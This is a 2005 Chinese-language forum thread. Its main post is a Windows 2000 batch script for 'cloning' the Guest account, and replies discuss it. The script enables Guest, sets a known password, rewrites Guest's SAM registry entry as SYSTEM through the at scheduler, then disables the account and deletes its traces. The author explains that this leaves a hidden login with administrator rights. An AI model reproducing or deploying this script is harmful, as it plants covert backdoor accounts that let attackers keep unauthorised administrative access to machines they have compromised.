标题: 批处理克隆用户账号(2000下测试通过,有什么意见直提) [打印本页]
作者: bagpipe 时间: 2005-10-25 11:34 标题: 批处理克隆用户账号(2000下测试通过,有什么意见直提)
@echo off
cls
echo ★★★★★★★★★★★★★Code By BagPipe★★★★★★★★★★★★★
echo Let`s go!
net user guest /active:yes >nul
net user guest 123456 >nul
net localgroup administrators guest /add
for /f "tokens=1,2 delims=:" %%a in ('time /t') do @set li=%%a&&@set bo=%%b
set /a wen=%bo%+1
echo Please Waiting ... ...
echo Windows Registry Editor Version 5.00 >c:\1.reg
echo. >>c:\1.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5] >>c:\1.reg
echo "F"=hex:02,00,01,00,00,00,00,00,fc,1a,ff,7f,d4,b9,c5,01,00,00,00,00,00,00,00,\ >>c:\1.reg
echo 00,7a,82,3b,d8,01,81,c5,01,00,00,00,00,00,00,00,00,00,02,1c,7d,d4,b9,c5,01,\ >>c:\1.reg
echo f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,13,00,01,00,00,00,00,\ >>c:\1.reg
echo 00,00,00,00,00,00,00 >>c:\1.reg
at \\127.0.0.1 %li%:%wen% /interactive ""regedit /s c:\1.reg"" >nul
ping 1.1.1.1 -n 50 -w 1000 >nul
net localgroup administrators guest /del >nul
net user guest /active:no >nul
del /q /f c:\1.reg
echo 搞定!!!
作者: JonePeng 时间: 2005-10-25 23:22
如果用权限比较低的 user 用户登录Win2000再进行这种克隆,恐怕系统不允许这样操作。
作者: bagpipe 时间: 2005-10-26 08:45
老大,你说的没错,你想想,如果没有改动,你本机ADMINISTRATOR可能对SAM注册表键值进行操作吗?呵呵... ....为什么要用AT命令呢?不就是为了以SYSTEM身份运行,唉,你不会先把ADMINISTRATOR用户对SAM权限改了以后在运行吧,呵呵,想想看吧,DOS很多都是用USER 或者GUEST权限运行不了的,别光顾着说这些问题,好吗?难道你用USER用户能够执行NET USER吗?
呵呵,不说了,自己看吧
作者: dos2006 时间: 2005-10-28 11:11
好象行不通呀~!!!
作者: bagpipe 时间: 2005-10-31 11:47
对了,忘了告诉大家了,这个是克隆GUEST用户的,克隆完以后GUEST用户仍然是禁用的,其实已经可以用此账号登陆系统了,跟管理员界面应该是一样的,本人2000 PRO 和 2000 SERVER通过测试,这个批处理运行的时候需要等待一段时间,毕竟我用AT命令需要延迟,而且需要有管理员的权限运行这个批处理,一般域用户是没法运行的,这个只供参考!
登陆用户名:GUEST
密码:123456